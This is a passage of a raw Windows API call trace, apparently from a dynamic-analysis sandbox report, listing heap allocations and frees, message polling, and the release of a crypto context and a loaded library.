lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.649] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.650] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0266.650] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0266.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.652] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0266.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0266.652] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.653] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0266.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0266.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0266.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0266.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0266.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0266.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0266.654] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.654] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.655] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.655] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0266.655] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.656] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.657] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.658] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0266.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.658] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0266.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.659] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.659] FreeLibrary (hLibModule=0x756e0000) returned 1 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0266.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0266.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.660] CloseHandle (hObject=0x2a0) returned 1 [0266.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0266.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.661] RtlAllocateHeap 